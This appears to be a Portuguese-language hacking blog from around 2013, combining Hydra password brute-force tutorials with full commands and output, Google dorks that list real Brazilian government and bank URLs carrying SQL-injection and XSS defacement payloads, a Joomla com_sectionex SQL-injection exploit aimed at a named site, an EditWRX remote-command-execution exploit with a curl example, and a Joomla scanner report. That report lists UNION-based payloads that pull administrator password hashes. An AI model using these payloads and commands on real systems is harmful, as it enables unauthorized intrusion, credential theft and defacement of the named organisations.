Hydra (http://www.thc.org) finished at 2009-08-17 21:24:34
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

*[21][ftp] host: 127.0.0.1   login: root   password: chaw123 -> Esta saída mostra que foi encontrado a senha:chaw123
pertencente ao usuário root.


Exemplo (2) http-head
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:40:56
[DATA] 16 tasks, 1 servers, 266 login tries (l:14/p:19), ~16 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1   login: root   password: Est2yu
[STATUS] attack finished for localhost (waiting for childs to finish)
select: Bad file descriptor
Hydra (http://www.thc.org) finished at 2010-01-28 00:41:00
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

O Hydra encontrou usuario:root||senha:Est2yu e fez o favor de salvar no arquivo 'saida.txt'.

Dentro do arquivo foi escrito as seguintes linhas pelo programa:
---------------------------------------------------------------------------------
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P
 pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1   login: root password: Est2yu
---------------------------------------------------------------------------------
/xammp/ é o caminho/path -> http://localhost/xammp/


Exemplo (3) http-post-form
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1
 http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-27 23:19:33
[DATA] 1 tasks, 1 servers, 19 login tries (l:1/p:19), ~19 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: admin
[STATUS] attack finished for 127.0.0.1 (valid pair found)
Hydra (http://www.thc.org) finished at 2010-01-27 23:19:33
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

-> Para criar esta sintaxe tive que olhar o código da pagina >>
---------------------------------------------------------------------------------

---------------------------------------------------------------------------------

 __________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
|                                                          |
|                                                          |
|                                                          |
|                                                          |
|           _____________________________________          |
|          |               nome                  |         |
|          |_____________________________________|         |
|           _____________________________________          |
|          |               senha                 |         |
|          |_____________________________________|         |
|                                                          |
|                     ________________                     |
|                    |     Enviar     |                    |
|                    |________________|                    |
|                                                          |
|__________________________________________________________|
|_Concluído________________________________________________|

-> POST index.php nome=^USER^&senha=^PASS^&boo=Enviar
-> Use o complemento 'live HTTP headers' para Firefox que com toda certeza facilitara bastante sua vida.
-> Quando envio dados errados a pagina me retorna 'invalido' no titulo.
---------------------------------------------------------------------------------
invalido
---------------------------------------------------------------------------------

Complete ->
---------------------------------------------------------------------------------
hydra -l [usuário] -P [lista-senhas] -o saida.txt -t 1 -f [host] http-post-form
"[destino]:[nome_da_variável]=^USER^&[nome_da_variável]=^PASS^:[frase de erro]"
---------------------------------------------------------------------------------

Completo ->
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------

Sendo que ^USER^ e ^PASS^ sera completado pelo hydra durante o loop que ele vai fazer testando senha por senha.
-> ^USER^ = admin e ^PASS^ = $_ <- -="" exemplo="" outro=""> http://localhost/login/login.html
-> Codigo fonte da pagina >>
---------------------------------------------------------------------------------

---------------------------------------------------------------------------------

Sintaxe:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt localhost http-post-form "/login/login_vai.php:login=^USER^&senha=^PASS^:Senha inválida!"
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-04-11 00:31:02
[DATA] 1 tasks, 1 servers, 11 login tries (l:1/p:11), ~11 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: teste
[STATUS] attack finished for localhost (valid pair found)
Hydra (http://www.thc.org) finished at 2010-04-11 00:31:07
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


Exemplo (4) POP3
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.xxx.com   login: [email protected] password: 123456
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


=================================================================================
[0x04] Proxy:
=================================================================================

Proxy web:
---------------------------------------------------------------------------------
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
---------------------------------------------------------------------------------

Para qualquer outro use : HYDRA_PROXY_CONNECT
---------------------------------------------------------------------------------
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
---------------------------------------------------------------------------------

Com autentificação :
---------------------------------------------------------------------------------
HYDRA_PROXY_AUTH="nome:senha"
---------------------------------------------------------------------------------

Quebrando Senha via HTTP com (Hydra)

Quebrando Senha via HTTP com (Hydra)

Criado por van Hauser para testes no Linux, THC-Hydra é um cracker de senhas de rede rapído e flexilvel. Utilizando um metódo capaz de quebrar senhas em segundos considerando seu processador e o tamanho da senha. THC-Hydra pode ser usado em modo de texto, mas há também uma interface grafica disponível. O THC-Hydra está disponível para Linux (tar ball), Windows via Cygwin e outros.

O que é isso?
Um guia básico de como usar hydra para quebrar a senha via http de um roteador doméstico

Como funciona?
Use um ataque de dicionário para testar falhas ou senhas simples uma a uma ou em clientes remotos.

O que é preciso?
- Hydra
- Dicionario Grande (wordlist)

Software
Nome: Hydra
Versão: 5.4
Site: #!/bin/the hacker's choice - THC
Download: The Hacker's Choice Download

Comandos:
hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get /

-l = login
-P = senha (veja na wordlist)
-e ns = verifica por senhas "vazias"
-t xx= Quanto tarefas são executadas por vez
-f = sair, caso uma vez encontre no 1 login/senha
-s = conectar via SSL
-vV = verbose mode (exibe mais informações)
192.168.1.1 = endereço IP
http-get = O que quebrar/método etc
/ = Pagina para quebra - root

Fonte: http://www.backtrack-linux.org/forums/showthread.php?t=27322
Vídeo: http://blip.tv/g0tmi1k/cracking-http-passwords-hydra-2337840

Referencia: http://www.thc.org/thc-hydra/

sexta-feira, 30 de agosto de 2013

GoogleINURL no face, últimas postagens

GoogleINURL no face

quarta-feira, 28 de agosto de 2013

PROJETO INURLPHP usando motor de busca do GOOGLE.

PROJETO INURLPHP usando motor de busca do GOOGLE.
FASE[01]

PROJETO BOTPHP usando motor de busca do GOOGLE. FAZE01
 FASE[02]
PROJETO BOTPHP usando motor de busca do GOOGLE. FAZE02

DORK buscar erros em sites de prefeituras


DORK buscar erros em sites de prefeituras

DORK: site:gov.br +(error) mysql (prefeitura) ext:asp -pdf

Resultados:

http://www3.prefeitura.sp.gov.br/cadlem/secretarias/negocios_juridicos/cadlem/integra.asp?%20alt=25042003P%20000352003SVMA%20%20%20%20%20%20%20%20&secr=87&depto=0&descr_tipo=PORTARIA


http://www.praiagrande.sp.gov.br/pgnoticias/noticias/noticia_01.asp?cod=14616'&cd_categoria=

http://smaonline.rio.rj.gov.br/sistemas/SCS/WPLTO/noticia_detalhada_free.asp?index=460'

http://www2.seplag.ce.gov.br/premio/projetos_filtro_detalhes_2011.asp?cdProjeto=262'



http://www.lajeado.rs.gov.br/download_anexo/index.asp?strARQUIVO=http://blog.inurl.com.br&strdescricao=%3Cdiv%20style=%22padding:50px;5px;0px;0px;%22%3E%3Cimg%20src=%22http://1.bp.blogspot.com/-UO00Uv2mkDU/UeWWrU1yRlI/AAAAAAAACik/RWAixxyctZ0/s1600/1062380_475164299242951_1939178094_n.jpg%22/%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C!--


http://www.portoalegre.rs.gov.br/noticias/ver_imprimir.asp?m1=21931'

http://www.carauari.am.gov.br/portal1/municipio/noticia.asp?iIdMun=100113017'&iIdNoticia=219764


http://www.proderj.rj.gov.br/artigo_completo.asp?ident=23'

http://www.praiagrande.sp.gov.br/Praiagrande/noticia_01.asp?cod=14616'&cd_categoria=

http://www.internetcomunitaria.rj.gov.br/detalhe_noticia.asp?ident=-31


http://ww1.saojoao.sp.gov.br/compras/locaweb_resultadoitens.asp?Modalidade=1&Numero=1068&Ano=2011&Fornecedor=3414&DscFornecedor=%3Cdiv%20style=%22padding:50px;5px;0px;0px;%22%3E%3Cimg%20src=%22http://1.bp.blogspot.com/-UO00Uv2mkDU/UeWWrU1yRlI/AAAAAAAACik/RWAixxyctZ0/s1600/1062380_475164299242951_1939178094_n.jpg%22/%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C!--&DscMod=COTA%C7%C3O%20DE%20SERVI%C7OS

Joomla com_sectionex v2.5.96 SQL Injection vulnerabilidade

Joomla com_sectionex v2.5.96 SQL Injection vulnerabilidade

Joomla com_sectionex v2.5.96 SQL Injection vulnerabilidade

DORK:site:bo inurl:/index.php?option=com_sectionex
DORK:site:br inurl:/index.php?option=com_sectionex

[1] parâmetro "filter_order":

URL /index.php?option=com_sectionex&view=category&id=X(INT)&Itemid=Y(INT)

EXEMPLO:
http://www.lapaz.bo/index.php?option=com_sectionex&view=category&id=143&Itemid=777

EXPLOIT:POST-> filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from
dual)%23&filter_order_Dir=DESC


[2] parâmetro "filter_order_Dir":

EXEMPLO:
http://www.lapaz.bo/index.php?option=com_sectionex&view=category&id=143&Itemid=777

EXPLOIT:POST-> filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1&filter_order_Dir=DESC
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23

segunda-feira, 26 de agosto de 2013

EditWRX CMS Executar codico remotamente + Admin Bypass Zero Day!

EditWRX é vulnerável a execução de código remoto através da falta de filtro function
open() no downloader, que pode ler em comandos canalizados na GET "download" Apesar do downloader ser um componente administrativo, O login Não é necessário para executar  a função.


DORK: +inurl:editwrx/wrx.cgi
Exploit: ?download=;uname%20-a| 

Exemplo de uso:
curl "http://sitevull.com/editwrx/wrx.cgi?download=;uname%20-a|"

terça-feira, 20 de agosto de 2013

A CAIXA TA MUITO ZUEIRA

O CAIXA TA MUITO ZUEIRO



http://www1.caixa.gov.br/imprensa/busca_resultado.asp?palavra=%3Cmarquee%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBR%3EGOOGLEINURL%3CBR%3EVEMPRARUA%3C/marquee%3E&sltEditoria=0&txtDiaI&txtMesI&txtAnoI&txtDiaF&txtMesF&txtAnoF&dtaInicial&dtaFinal&dtaLimite=01%2F01%2F1900&dscTipNoticia  XSS


http://conectividade.caixa.gov.br/registro/filtroerro.jsp?msgerro=%3Ccenter%3E%3Cfont+size%3D%2250px%22+%3EATIVISMO+NACIONAL%3C%2Ffont%3E%3Cbr%3E%3Ca+href%3D%22https%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%22%3Ehttps%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%3Cbr%3E%3Cimg+src%3D%22https%3A%2F%2Ffbcdn-sphotos-a-a.akamaihd.net%2Fhphotos-ak-frc3%2F1149511_154022918127275_1790780600_o.jpg%22%3E&erroprog&tituloerro=Erro XSS



https://www5.caixa.gov.br/fornecedores/pregao_internet/asp/compartilhadas/frm_consulta_regiao.asp?sLnkPagina=%3Ccenter%3E%3Cfont+size%3D%2250px%22+%3EATIVISMO+NACIONAL%3C%2Ffont%3E%3Cbr%3E%3Ca+href%3D%22https%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%22%3Ehttps%3A%2F
%2Fwww.facebook.com%2FAtivismoNacional%3Cbr%3E%3Cimg+src%3D%22https%3A%2F%2Ffbcdn-sphotos-a-a.akamaihd.net%2Fhphotos-ak-frc3%2F1149511_154022918127275_1790780600_o.jpg%22%3E XSS



http://www1.caixa.gov.br/download/asp/ent_hist.asp?download= GET


http://www1.caixa.gov.br/imprensa/noticias/asp/popup_box.asp?codigo=7013095' GET

http://www1.caixa.gov.br/imprensa/noticias/asp/popup.asp?codigo=7013095' GET



http://mcmv.caixa.gov.br/xmlrpc.php



http://www1.caixa.gov.br/download/asp/download.asp?subCategId=198'&CategId=65&subCateglayout=Manuais&Categlayout=Cobran%E7a%20Caixa%20%96%20SICOB GET



http://www5.caixa.gov.br/fornecedores/licitacoes/asp/editalc.asp?ed=7855.01.1048.0'/2005&gisup=BR GET



https://expressoparceiros.caixa.gov.br/login.php?cd=10&phpgw_forward=%2Fnews_admin%2Findex.php

http://www1.caixa.gov.br/gov/_includes/path_upload.asp


https://webp.caixa.gov.br/urbanizacao/siurbn/acompanhamento/ac_publico/sistema/_includes/rel_alerta.asp?codTitulo=1&strMensagem=%3Ccenter%3E%3Cfont+size%3D%2250px%22+%3EATIVISMO+NACIONAL%3C%2Ffont%3E%3Cbr%3E%3Ca+href%3D%22https%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%22%3Ehttps%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%3Cbr%3E%3Cimg+src%3D%22https%3A%2F%2Ffbcdn-sphotos-a-a.akamaihd.net%2Fhphotos-ak-frc3%2F1149511_154022918127275_1790780600_o.jpg%22%3E



http://webcache.googleusercontent.com/search?q=cache:4xP1WubO9MMJ:www1.caixa.gov.br/loterias/_includes/_inc_resultado_de_ontem.asp+&cd=14&hl=pt-BR&ct=clnk&gl=br

SELECT * FROM ( SELECT '2' AS CODIGO, '3' AS ORDEM, 'Lotomania:' AS MODALIDADE, CO_CONCURSO, DE_RESULTADO AS RESULTADO1, DATEPART(WEEKDAY,DT_APURACAO) AS "DIA" FROM LOTTB003_LOTOMANIA WHERE CO_CONCURSO = (SELECT MAX(CO_CONCURSO) FROM LOTTB003_LOTOMANIA) UNION SELECT '3' AS CODIGO, '1' AS ORDEM, 'Quina:' AS MODALIDADE, CONCURSO, RESULTADO AS RESULTADO1, DATEPART(WEEKDAY,DATA) AS "DIA" FROM QUINA WHERE CONCURSO = (SELECT MAX(CONCURSO) FROM QUINA) UNION SELECT '4' AS CODIGO, '2' AS ORDEM, 'Mega-Sena:' AS MODALIDADE, CONCURSO, RESULTADO AS RESULTADO1, DATEPART(WEEKDAY,DATA) AS "DIA" FROM MEGASENA WHERE CONCURSO = (SELECT MAX(CONCURSO) FROM MEGASENA) UNION SELECT '8' AS CODIGO, '4' AS ORDEM, 'Dupla-Sena:' AS MODALIDADE, CONCURSO, RESULTADO_SORTEIO1 + '-' + RESULTADO_SORTEIO2 AS RESULTADO1, DATEPART(WEEKDAY,DATA) AS "DIA" FROM LOTTB030_DUPLASENA WHERE CONCURSO = (SELECT MAX(CONCURSO) FROM LOTTB030_DUPLASENA) UNION SELECT '11' AS CODIGO, '5' AS ORDEM, 'Lotofácil:' AS MODALIDADE, NU_CONCURSO, DE_RESULTADO AS RESULTADO1, DATEPART(WEEKDAY,DT_APURACAO) AS "DIA" FROM LOTTB035_LOTOFACIL WHERE NU_CONCURSO = (SELECT MAX(NU_CONCURSO) FROM LOTTB035_LOTOFACIL)) AS GERAL WHERE GERAL.CODIGO IN (SELECT C.CO_MODALIDADE FROM LOTTB015_DIA_SEMANA A, LOTTB017_SORTEIO B, LOTTB016_MODALIDADE C WHERE A.CO_DIA_SEMANA = B.CO_DIA_SEMANA AND B.CO_MODALIDADE = C.CO_MODALIDADE AND A.CO_DIA_SEMANA = ( SELECT DIASEMANA = CASE WHEN DATEPART(WEEKDAY,GETDATE()) = 2 THEN DATEPART(WEEKDAY,(GETDATE())-2) ELSE DATEPART(WEEKDAY,(GETDATE())-1) END ) )ORDER BY ORDEM


O ITAÚ TA MUITO ZUEIRO

O ITAÚ TA MUITO ZUEIRO

O BRADESCO TA MUITO ZUEIRO!

O BRADESCO TA MUITO ZUEIRO




quarta-feira, 14 de agosto de 2013

Joomla Hacking - Exploits

Joomla hacking





 ~Generic version family ....... [1.5.x]

~1.5.x htaccess.txt revealed [1.5.4 - 1.5.14]
~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]

* Deduced version range is : [1.5.12 - 1.5.14]




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts.
Vulnerable? N/A

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? No

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No

# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No

# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No

# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? No

# 10
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No

# 11
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No

# 12
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No

# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes

# 15
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No

# 17
Info -> CoreTemplate: ja_purity XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /templates/ja_purity/
Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.
Vulnerable? No

# 18
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No

# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

# 20
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confir m 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password
Vulnerable? No

# 21
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id= 60&Itemid=99999+UNION+SELECT+1,concat(0x1e,userna m e,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FRO M+jos_users+where+usertype=0x53757065722041646d696 e6973747261746f72--
Vulnerable? No

# 22
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%2 2%3Becho%20md5(911)%3B
Vulnerable? No

# 23
Info -> CoreComponent: com_admin File Inclusion Vulnerability
Versions Affected: N/A
Check: /administrator/components/com_admin/admin.admin.html.php
Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
Vulnerable? No

# 24
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=55 0513+and+1=2+union+select+concat(username,char(58) ,password)+from+jos_users+where+usertype=0x5375706 5722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 25
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 26
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No

# 27
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No

# 28
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No

# 29
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive
Vulnerable? No

# 30
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No

# 31
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? No

# 32
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 33
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosms [email protected]<<>AAA<><>
Vulnerable? No

# 34
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2
Vulnerable? No

# 35
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes

# 36
Info -> Component: JCE XSS+File Inclusion Vulnerability
Versions Affected: 1.0.4<=
Check: /components/com_jce/
Exploit: 1) Input passed to the "img", "title", "w", and "h" parameters within jce.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources.
Vulnerable? No

# 37
Info -> Component: com_k2 (sectionid) SQL Injection Vulnerability
Versions effected: 1.0.1 Beta <=
Check: /components/com_k2/
Exploit: /index.php?option=com_k2&view=itemlist&category=nul l'+and+1=2+union+select+1,concat(username,0x3a,pas sword),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users +where+usertype=0x53757065722041646d696e6973747261 746f72--
Vulnerable? No

# 38
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No

# 39
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&fee did=-1%20union%20select%201,concat%28username,char%2858 %29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from% 20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&fee did=-1%20union%20select%201,concat%28username,char%2858 %29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from% 20jos_users--
Vulnerable? No

# 40
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

# 41
Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities
Versions Affected: 0.9.1 <=
Check: /administrator/index.php?option=com_djartgallery&task=editItem&ci d[]=1'+and+1=1+--+
Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&ci d[]=1'+and+1=1+--+
Vulnerable? N/A